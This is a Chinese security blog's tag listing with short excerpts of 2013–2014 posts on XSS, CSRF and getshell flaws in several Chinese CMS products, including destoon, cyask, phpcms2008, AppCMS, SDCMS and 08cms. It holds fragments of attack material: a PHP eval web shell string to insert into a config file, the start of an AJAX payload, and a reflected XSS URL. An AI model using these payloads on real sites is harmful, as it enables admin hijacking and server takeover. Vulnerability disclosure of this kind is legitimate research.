标签 xss 下的文章

destoon新版短消息中心xss

Author:Saline 最近发现xss其实蛮多的。随意就发现了的说..不过乌云都不收 destoon新版短消息中心xss指谁打谁首先选取一个对象我们去发消息 然后抓包,往里面填充我们的xss代码 其中的xss [php][/php] 采用了URLEncode编码http://tool.chinaz.com/Tools/URLEncode.aspx然后我们来试着点开该信息,审查元素,代码...

没穿底裤 2014 年 03 月 03 日 1 条评论

cyask 前台xss与后台Getshell

by 0day5_saline 首先是注册一枚 然后查看会员资料,发现xss已经成功的触发了 关于后台拿shell,在配置文件出插入 [php]';eval($_POST[c]);//[/php] 经过检查,只能插入四处 插入后连接 askdata\cache\cache_variable.php

没穿底裤 2014 年 02 月 25 日 暂无评论

phpcms2008会员中心某处xss

by 0day5_Saline首先去注册一个会员,然后到会员中心随处修改资料,写入xss代码。诱发管理后台点击[php] function ajax(){ var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); } else if(window.ActiveXObject) { var ...

没穿底裤 2014 年 02 月 24 日 2 条评论

AppCMS注入及xss漏洞大礼包exp,可打后台密码及地址

############################# # by phithon # http://www.leavesongs.com #############################发乌云厂家不确认,官网的漏洞补了,不过还有很多站漏洞依旧存在。干脆给各位法克的同学学习了。 希望大家认真的看完,并不止于使用exp。看完对你以后的测试一定有启发。我不喜欢隐藏或收费,有钱的捧个钱...

没穿底裤 2013 年 12 月 15 日 暂无评论

SDCMS某处存储型xss可劫持管理员

SDCMS某处存储型xss,可跨进后台直接劫持管理员问题还是在短消息处。之前SDCMS短消息处存在xss可以直接劫持任意指定用户,这个bug修改了,但是没有修复完全,这次来个更狠的,直接劫持管理员账户。首先,我们发送短消息给任意存在的用户,这里我们用222222给111111账户发消息:发送的内容我们填写 [php]">[/php]管理员后台查看后会触发

没穿底裤 2013 年 12 月 08 日 暂无评论

08cms会员中心xss+csrf可getshell

这个属于本站原创,很难看到的哦 首先是在搜索出存在反射性的跨站搜索处存在反射性xss [php]http://0day5.com/search.php?caid=2&ccid1=208&chid=4&djfrom=1&djto=1prompt(968256)http://0day5.com/search.php?caid=2&ccid1=208&chid=4&djfrom=1prompt(9...

没穿底裤 2013 年 12 月 08 日 5 条评论